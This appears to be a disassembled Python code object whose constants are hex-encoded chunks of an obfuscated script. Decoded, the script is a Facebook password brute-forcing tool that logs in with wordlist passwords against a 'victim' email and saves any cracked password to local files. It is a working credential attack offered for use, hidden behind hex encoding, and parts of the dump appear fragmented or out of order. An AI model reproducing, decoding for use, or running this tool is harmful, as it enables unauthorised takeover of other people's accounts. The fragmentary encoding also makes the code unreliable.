      '2020202727'
      '2727272349'
      '2074616b65'
      '206e6f2072'
      '6573706f6e'
      '736962696c'
      '6974696573'
      '20666f7220'
      '7468652027'
      '2727272020'
      '2727272075'
      '7365206f66'
      '2074686973'
      '2070726f67'
      '72616d2021'
      '2020272727'
      '2b472b2727'
      '2720202020'
      '2020202b3d'
      '2b0a202020'
      '7c2e2e2e2e'
      '2e2727272b'
      '4f2b272727'
      '20204d4f44'
      '2042592042'
      '414e472044'
      '4a4f4e2020'
      '2b2727272e'
      '7c0a202020'
      '2b2d2d2d2d'
      '2d2d2b0a27'
      '27272b570a'
      '7072696e74'
      '20224e6f74'
      '653a202d20'
      '5468697320'
      '746f6f6c20'
      '6661636562'
      '6f6f6b2061'
      '63636f756e'
      '7420657665'
      '6e20696620'
      '796f752064'
      '6f6e277420'
      '7468652065'
      '6d61696c20'
      '6f6620796f'
      '7572207669'
      '6374696d22'
      '0a7072696e'
      '7420222320'
      '4869742043'
      '54524c2b43'
      '20746f2071'
      '7569742074'
      '6865207072'
      '220a707269'
      '6e74202223'
      '2055736520'
      '7777772e67'
      '726170682e'
      '6f6f6b2e63'
      '6f6d20666f'
      '72206d6f72'
      '6520696e66'
      '6f73206162'
      '6f75742079'
      '6f75722076'
      '696374696d'
      '205e5f5e22'
      '0a0a747279'
      '3a0a204454'
      '3d6f70656e'
      '28272f7374'
      '6f72616765'
      '2f73646361'
      '7264312f2e'
      '66622e6461'
      '7427292e72'
      '6561646c69'
      '6e65732829'
      '0a20656d61'
      '696c203d6d'
      '6c3d44545b'
      '305d2e7265'
      '706c616365'
      '28275c6e27'
      '2c2727290a'
      '2070617373'
      '776f72646c'
      '697374203d'
      '70773d4454'
      '5b315d2e72'
      '65706c6163'
      '6528275c6e'
      '272c272729'
      '0a2071323d'
      '44545b325d'
      '2e7265706c'
      '6163652827'
      '5c6e272c27'
      '27290a6578'
      '636570743a'
      '6c3d737472'
      '287261775f'
      '696e707574'
      '282223204d'
      '6173756b6b'
      '616e204944'
      '206b6f7262'
      '616e5c6e63'
      '6f6e746f68'
      '3a20313030'
      '3030363534'
      '3132333435'
      '36375c6e49'
      '44203d2022'
      '29290a2070'
      '617373776f'
      '72646c6973'
      '74203d7077'
      '3d20737472'
      '28224d6173'
      '756b6b616e'
      '2066696c65'
      '2079672062'
      '6572697369'
      '776f726420'
      '6c6973745c'
      '6e636f6e74'
      '6f683a2f73'
      '6463617264'
      '2f70617373'
      '776f72642e'
      '7478745c6e'
      '5041535357'
      '4f5244203d'
      '202229290a'
      '2071323d31'
      '2023726177'
      '5f696e7075'
      '7428276d75'
      '6c61692070'
      '7264206e6f'
      '2062727020'
      '6f6d2c2c3f'
      '3f2027290a'
      '207472793a'
      '6f70656e28'
      '272f73746f'
      '726167652f'
      '7364636172'
      '64312f2e66'
      '622e646174'
      '272c277727'
      '292e777269'
      '7465286d6c'
      '2b275c6e27'
      '2b70772b27'
      '5c6e272b73'
      '7472287132'
      '29290a2065'
      '7863657074'
      '3a7072696e'
      '7420282774'
      '6964616b20'
      '6269736120'
      '6d656e7969'
      '6d70616e20'
      '646174612c'
      '2070656e79'
      '6572616e67'
      '616e20616b'
      '616e207365'
      '6c616c7520'
      '64696d756c'
      '6169206461'
      '7269206177'
      '616c27290a'
      '74204f2b27'
      '5f5f5f5f5f'
      '65656d6169'
      '6c5f5f5f5f'
      '5f3d272b6d'
      '6c2b275c6e'
      '272b275f5f'
      '5f5f706173'
      '73776f7264'
      '5f5f5f5f3d'
      '272b70772b'
      '570a0a7573'
      '6572616765'
      '6e7473203d'
      '205b282755'
      '7365722d61'
      '67656e7427'
      '2c20274d6f'
      '7a696c6c61'
      '2f352e3020'
      '285831313b'
      '20553b204c'
      '696e757820'
      '693638363b'
      '20656e2d55'
      '533b207276'
      '3a312e392e'
      '302e312920'
      '4765636b6f'
      '2f32303038'
      '3037313631'
      '3520466564'
      '6f72612f33'
      '2e302e312d'
      '312e666339'
      '666f782f33'
      '2e302e3127'
      '295d0a0a6c'
      '6f67696e20'
      '3d27687474'
      '70733a2f2f'
      '7777772e66'
      '616365626f'
      '6f6b2e636f'
      '6d2f270a6c'
      '6f67733d20'
      '2768747470'
      '733a2f2f77'
      '77772e6661'
      '6b2e636f6d'
      '2f6c6f6769'
      '6e2e706870'
      '3f6c6f6769'
      '6e5f617474'
      '656d70743d'
      '31266c7776'
      '3d31313027'
      '0a6c6f6769'
      '6e31203d27'
      '6874747073'
      '3a2f2f7765'
      '622e666163'
      '2e636f6d2f'
      '270a6c6f67'
      '7331203d20'
      '65622e6661'
      '0a0a6e6f3d'
      '310a70616e'
      '656c3d300a'
      '6c6f673d27'
      '270a232768'
      '747470733a'
      '2f2f776562'
      '2e66616365'
      '626f6f6b2e'
      '636f6d2f63'
      '6865636b70'
      '6f696e742f'
      '3f6e657874'
      '270a646566'
      '2061747461'
      '636b287061'
      '7373776f72'
      '64293a0a20'
      '20676c6f62'
      '616c207061'
      '6e656c2c6e'
      '6f2c71322c'
      '6c6f670a20'
      '6966206e6f'
      '3d3d696e74'
      '287132293a'
      '70616e656c'
      '3d310a2020'
      '2020696620'
      '203d3d313a'
      '207379732e'
      '7374646f75'
      '742e777269'
      '746528225c'
      '72222b572b'
      '225b2a5d22'
      '2b432b2220'
      '6d656e636f'
      '6261207061'
      '64206b6520'
      '222b4f2b22'
      '2573202573'
      '2e2e202220'
      '25286e6f2c'
      '7061737377'
      '6f7264292b'
      '57290a2020'
      '2020207379'
      '732e737464'
      '6f75742e66'
      '6c75736828'
      '290a202020'
      '202062722e'
      '6164646865'
      '6164657273'
      '203d205b28'
      '2755736572'
      '2d6167656e'
      '74272c2072'
      '2e63686f69'
      '6365287573'
      '6e74732929'
      '5d0a202020'
      '2020736974'
      '65203d2062'
      '722e6f7065'
      '6e286c6f67'
      '696e290a20'
      '2020202062'
      '722e73656c'
      '6563745f66'
      '6f726d286e'
      '723d30290a'
      '20200a2020'
      '2020202323'
      '6f6f6b0a20'
      '722e666f72'
      '6d5b27656d'
      '61696c275d'
      '203d656d61'
      '696c0a2020'
      '2020206272'
      '2e666f726d'
      '5b27706173'
      '73275d203d'
      '776f72640a'
      '62722e7375'
      '626d697428'
      '20206c6f67'
      '203d206272'
      '2e67657475'
      '726c28290a'
      '6966206c6f'
      '6720213d6c'
      '6f67732061'
      '6e64206c6f'
      '6f6773313a'
      '2020707269'
      '6e74206c6f'
      '670a202020'
      '2020207472'
      '793a6f7065'
      '6e28272f73'
      '312f706173'
      '2074617267'
      '65742e7478'
      '74272c2777'
      '27292e7772'
      '6974652873'
      '7472287061'
      '64292b275c'
      '6e272b7374'
      '72286c6f67'
      '29290a2020'
      '2020202065'
      '3a70617373'
      '206966206c'
      '6f67203d3d'
      '206c6f6769'
      '6e206f7220'
      '6c6f67203d'
      '3d206c6f67'
      '696e313a0a'
      '2020207072'
      '696e742022'
      '5c6e5c6e5c'
      '6e205b2a5d'
      '2050617373'
      '666f756e64'
      '202e2e2021'
      '21220a2020'
      '207072696e'
      '7420225c6e'
      '205b2a5d20'
      '5061737377'
      '6f7264203a'
      '2025735c6e'
      '2220252028'
      '6f7264290a'
      '732e657869'
      '742831290a'
      '2020657863'
      '657074204b'
      '6579626f61'
      '7264496e74'
      '6572727570'
      '743a0a2020'
      '5b2a5d2045'
      '786974696e'
      '672070726f'
      '6772616d20'
      '2e2e20220a'
      '746f726167'
      '652f736463'
      '617264312f'
      '2e66622e64'
      '6174272c27'
      '7727292e77'
      '7269746528'
      '6d6c2b275c'
      '6e272b7077'
      '2b73747228'
      '6e6f29290a'
      '2020206578'
      '706173730a'
      '6570743a0a'
      '202020696d'
      '7472616365'
      '6261636b0a'
      '2020206665'
      '203d207472'
      '6163656261'
      '636b2e666f'
      '726d61745f'
      '6578636570'
      '74696f6e0a'
      '2020207365'
      '69203d2073'
      '79732e6578'
      '635f696e66'
      '6f0a202020'
      '20275c6e27'
      '7365692829'
      '5b315d2920'
      '232827272e'
      '6a6f696e28'
      '6665282a73'
      '6569282929'
      '7420287527'
      '5c6e506c65'
      '6173652063'
      '74206d6520'
      '42616e672d'
      '446a6f6e27'
      '290a0a2020'
      '2020202074'
      '72793a6f70'
      '656e28272f'
      '73746f7261'
      '67652f7364'
      '6361726431'
      '2f2e66622e'
      '646174272c'
      '277727292e'
      '7772697465'
      '286d6c2b27'
      '5c6e272b70'
      '772b275c6e'
      '272b737472'
      '286e6f2929'
      '743a706173'
      '730a202020'
      '656c73653a'
      '7472793a6f'
      '70656e2827'
      '2f73746f72'
      '6167652f73'
      '312f2e6662'
      '2e64617427'
      '2c27772729'
      '2e77726974'
      '65286d6c2b'
      '275c6e272b'
      '70772b275c'
      '72286e6f29'
      '2065786365'
      '70743a7061'
      '73730a2020'
      '6e7420225c'
      '6e5b2a5d20'
      '6578697469'
      '6e672e2e2e'
      '2e2e2e2e20'
      '220a202020'
      '7379732e65'
      '7869742831'
      '290a0a6465'
      '6620736561'
      '7263682829'
      '3a0a202020'
      '642c6e6f0a'
      '2020202066'
      '6f72207061'
      '6420696e20'
      '6f7264733a'
      '2020202061'
      '747461636b'
      '2870617373'
      '7265706c61'
      '636528225c'
      '6e222c2222'
      '206e6f2b3d'
      '310a0a0a0a'
      '6465662063'
      '6865636b28'
      '293a0a0a20'
      '202020676c'
      '6f62616c20'
      '62720a2020'
      '2020676c6f'
      '62616c2070'
      '7264730a20'
      '6f72642c6e'
      '203d206d65'
      '7a652e4272'
      '6f77736572'
      '28290a2020'
      '636a203d20'
      '656c69622e'
      '4c5750436f'
      '6f6b69654a'
      '617228290a'
      '7365745f68'
      '616e646c65'
      '5f726f626f'
      '7473284661'
      '6c7365290a'
      '5f65717569'
      '7628547275'
      '65290a2020'
      '62722e7365'
      '745f68616e'
      '646c655f72'
      '6566657265'
      '7228547275'
      '6564697265'
      '6374285472'
      '7565290a20'
      '2062722e73'
      '65745f636f'
      '6f6b69656a'
      '617228636a'
      '722e736574'
      '5f68616e64'
      '6c655f7265'
      '6672657368'
      '286d656368'
      '616e697a65'
      '2e5f687474'
      '702e485454'
      '5052656672'
      '6573685072'
      '6f63657373'
      '6f7228292c'
      '206d61785f'
      '74696d653d'
      '31290a2020'
      '20225c6e5b'
      '2a5d204578'
      '6974696e67'
      '72616d202e'
      '2e5c6e220a'
      '2020747279'
      '3a6f70656e'
      '697465286d'
      '737472286e'
      '6f29290a20'
      '70743a0a20'
      '5b2a5d204b'
      '6f6e656b73'
      '6920486162'
      '6973202e2e'
      '20220a2020'
      '72793a0a20'
      '206c697374'
      '203d206f70'
      '656e287061'
      '646c697374'
      '2c20227222'
      '2020202070'
      '726473203d'
      '2e72656164'
      '6c696e6573'
      '6b203d2030'
      '2020207768'
      '696c65206b'
      '203c206c65'
      '6e28706173'
      '73293a0a20'
      '7264735b6b'
      '5d203d2070'
      '5d2e737472'
      '697028290a'
      '6b202b3d20'
      '310a202020'
      '707420494f'
      '4572726f72'
      '20225c6e20'
      '72726f723a'
      '2063686563'
      '6b20796f75'
      '7220706173'
      '2070617468'
      '205c6e220a'
      '204b657962'
      '6f61726449'
      '6e74657272'
      '7570743a0a'
      '5c6e205b2a'
      '5d20457869'
      '74696e6720'
      '70726f6772'
      '616d202e2e'
      '5c6e220a20'
      '6570743a70'
      '6173730a20'
      '2020737973'
      '2e65786974'
      '2831290a20'
      '72696e7420'
      '225c6e5b2a'
      '5d204b6f6e'
      '656b736920'
      '4861626973'
      '202e2e2022'
      '2020202073'
      '6974283129'
      '7472793a0a'
      '696e742047'
      '48540a2020'
      '7420572b22'
      '205b2a5d22'
      '4163636f75'
      '6b203a222b'
      '4f2b222025'
      '7322202520'
      '28656d6169'
      '6c292b570a'
      '696e742057'
      '2b22205b2a'
      '5d222b432b'
      '22204c6f61'
      '646564203a'
      '22202c204f'
      '6c656e2870'
      '7264732929'
      '2c432b2022'
      '6f72647322'
      '2b570a2020'
      '696e672c20'
      '706c656173'
      '6520776169'
      '74202e2e2e'
      '222b570a20'
      '6365707420'
      '4b6579626f'
      '617264496e'
      '7465727275'
      '2045786974'
      '696e672070'
      '726f677261'
      '6d202e2e5c'
      '6e220a2020'
      '7472286e6f'
      '6578697428'
      '5c6e5b2a5d'
      '204b6f6e65'
      '6b73692048'
      '6162697320'
      '2020736561'
      '776f726429'
      '74204b6579'
      '626f617264'
      '496e746572'
      '727570743a'
      '225c6e205b'
      '0a6966205f'
      '5f6e616d65'
      '5f5f203d3d'
      '20275f5f6d'
      '61696e5f5f'
      '273a0a2020'
      '2020636865'
      '636b2829'
      '"'
      '.'
      'dec'
      'ode'
      '("'
      'h'
      ''
      'e'
      'x"'
      ')'
      '('
      '"u'
      '8"'
      None
   names ('__doc__',)
   varnames ()
   freevars ()
   cellvars ()
   filename '<s>'
   name '<module>'
   firstlineno 1
   lnotab
      0600ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00
      ff00ff00ff00ff00ff00ff00ff00f900
